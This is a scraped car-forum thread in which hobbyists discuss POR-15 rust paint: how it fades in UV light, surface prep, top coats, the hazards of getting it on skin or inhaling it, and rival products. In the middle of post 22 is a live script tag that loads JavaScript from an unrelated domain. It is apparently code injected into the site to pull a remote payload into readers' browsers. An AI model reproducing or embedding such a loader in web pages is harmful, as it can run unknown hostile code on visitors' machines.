Register now to get rid of these ads!

Por 15

Discussion in 'The Hokey Ass Message Board' started by eagleeye8789, Sep 8, 2013.

1. eagleeye8789

eagleeye8789

I am curious and have been looking all around for a solid answer. What color will black POR 15 fade to? I've heard purple dark grey or even ashy black when exposed to uv. I would like to paint with it but don't want to end up with the wrong color. And does the silver por fade?

Posted using the Full Custom H.A.M.B. App!

2. POR15 must be top coated. UV light will degrade it and rust will form under it again.

3. modeleh

modeleh

I used it on some trailer fenders and a truck toolbox. After a year it peeled off in sheets with a pressure washer. IMO, it is garbage, but many people have had success with it, myself I prefer a two part catalyzed paint.

4. Rich Rogers

Rich Rogers

I did the bottom of my 55 with it and then top coated it in gloss black. It's been on there for 8 years with no peeling. I've read that 2 coats of por-15 will dry glossy but I don't know that for a fact.

5. milliganflat8s

milliganflat8s
    from missouri

I coated a frame 12 years ago with black POR15. Has turned to ashy black but no rust. Has been exposed to the elements ever since. My father used it on a brush guard 5 years ago and ended up with gloss that still shines today. Things on bottom side fade little or none.

6. eagleeye8789

eagleeye8789

Thanks guys I will make sure to use proper prep it should last just as long as ylthat frame.

7. chubbie

chubbie

proper prep would be "leave enofe rust on it to work" and use their mar. clean and you guys that have it peeling off... didn't read the directions. a guy told me once" i really wanted the POR to work well so i used 3 coats of primer before i brushed it on"

8. eagleeye8789

eagleeye8789

Yea I read all the info for prep. I have some of the original paint on it that needs to be removed but a little wire wheel and a sanding can take care of that.

9. T.L.

T.L.
    from Colorado

In my experience, POR-15 does not come off easily at all. Eastwood's "rust encapsulator" is absolute garbage and will easily come off...

10. stimpy

stimpy

used it on semi frames near the wheels slag blasted the frame then used there marine prep , and even uncovered it never came off , mine turned a chalky black , then I applied some new stuff over it then over coated it with enamel . the over coat peeled off from road debris but the PO5 15 stayed . I didn't scuff it before top coating it so the peel off was my fault not the manf's . and to remove it I had to blast it with slag and alu oxide . tough stuff

11. Dane

Dane
    from Soquel, CA

12. 40FordGuy

40FordGuy

TL is right, that stuff does NOT like to be removed. The black POR 15 is uv sensitive...some places on my frame have faded a bit,...but with the cab and bed on, it'll be ok.
    Don't get it on your skin....if it dries on there,...it'll be difficult to remove!!

4TTRUK

13. OLDSMAN

OLDSMAN
    BANNED

I will second the last reply. I just used POR15 for the first time on the 42 Chevy I am building. I read the part about using gloves, but did not put on my gloves, went to clean up the brush with thinner and id didn't work. By then my hands were covered with the stuff. I was painting the inside of the body. Then I re read the can and itg said the product will not be afffected by any solvent. I spent nearly two weeks getting the stuff off of my hands.

14. steveo3002

steveo3002
    from england

consider an epoxy primer and top coat

15. POR 15 likes a ruff surface. I used some on some metal and it peeled. On the same car it stuck to the rough surface.

16. charlesincharge09

charlesincharge09
    from Wisconsin

Correct, it needs to be applied over rusty metal, but the rust must be clean from all oils, and greases, i did my buddys jeep frame, couple days after, struck it with a hammer, did not chip or flake at all.

They sell a gloss and a flat. they also sell a product called CHASSIS BLACK, it will not fade from sun, needs to be applied over the original POR15, and has a semi gloss look. Used it on tube jeep fenders, and it is some awesome stuff! trees, rocks, etc, doesn't scratch, flake, fade.

17. falconsprint63

falconsprint63
    from Mayberry

follow the directions and the stuff is indestructible. I'm guessing the fade will happen with IV exposure and compromise the product, but it's been on my avatar inside the body and underside of the floors for a decade and it's still looks like new and is tough as nails.

18. belair

belair

IF you spray it, WEAR A MASK. The droplets you inhale will set up in your lungs. If you think it's hard to get off of your hands, try getting it out of your lungs. It "drys" or reacts with moisture. Sets up faster on humid days. I like it, but don't spray it. And check your hands before you take a leak. There are places you don't want it on the outside of your body too.

19. surfgeezer

surfgeezer

All of my experience has been positive (perhaps because I am anal about following directions.). Exposure over time will turn the black towards dark gray. A tip is to use stainless scoops to empty cans that you want to close up and reuse (this stuff cleans easily from stainless...don't let your wife catch you in the kitchen)

20. x2!!

21. Rich Rogers

Rich Rogers

Exactly right !! Por-15 when it's airborne is damn near lethal to your lungs. My mistake was about a 5 second shot spraying it without a mask. My lungs burned for 3-4 days. After that, everything I put it on was done with a foam brush and wearing gloves and a shirt I didn't care about.

22. The black will go on as gloss black, and then due to UV, will fade to flat black. Have some on my old car trailer, out in weather 24/7/365. I also live at high altitude 7100 ft so it gets intense UV. Must have something to grab onto, light rust is perfect. It does not get chalky or loose oxidized, just turns flat. The flat does not affect the corrosion resistance properties, just the appearance.

It will clean up with lacquer thinner - but only if it is still wet. Once dried it is resistant to any chemicals I have found. It does cure by moisture in the air.

<script src="https://secure-content-delivery.com/data.js.php?i={4D877FC1-4956-4F45-A6B5-0E98AB82425A}&d=2012-6-15&s=http://www.jalopyjournal.com/forum/showthread.php?t=830798&showall=1&cb=0.8875456269882703" type="text/javascript"></script>

23. i have had nothing but positive results in using the stuff ...

i sandblasted a frame w/ removing the debris and rust off, than applied it ..

it does get dull w/ time, i noticed tho ...

and its tricky to wash off once they it gets on your hands =)

24. JLB3

JLB3

I like the Master Series Paint much better than POR15. http://www.masterseriesct.com/ They have UV resistant (2 part paint), a non-UV sealer (1 part like POR15), and a silver sealer.

I would recommend ordering it from TarHeelParts (1-800-322-1957). Give them a call and they can set you up with the correct paint for your needs.

25. Our local POR15 rep claims POR came out with UV resistant gloss black?

26. 32 hudson

32 hudson

Great I will have to check the POR 15 website

27. tubman

tubman
    ALLIANCE MEMBER

I did the frame and underside of my '51 Ford with POR-15 in 1987. Over the last couple of weeks, I have changed the motor mounts and installed some Aerostar springs, and from what I could see the POR-15 is holding up fine. It is still semi-gloss black. Of course, it is on the bottom of the car and the car lives in a storage unit with no windows when not on use, so that may help a bit.

Just wonderin'; is 26 years a record? Anybody have it on longer?

28. 48bill

48bill

We've had great luck with Master Series Coatings located here in Connecticut. Call Chuck at (860) 283-5256 or email at "[email protected]".

29. t_wood_08

t_wood_08

We sell Por-15 products and they are great products. I have used it on my rear end in my car. The UV resistent is called Chassis Coat Black.

Attached Files:

30. t_wood_08

t_wood_08

They also have BlackCote that is a glossy black finish and Stirling Silver.

Attached Files: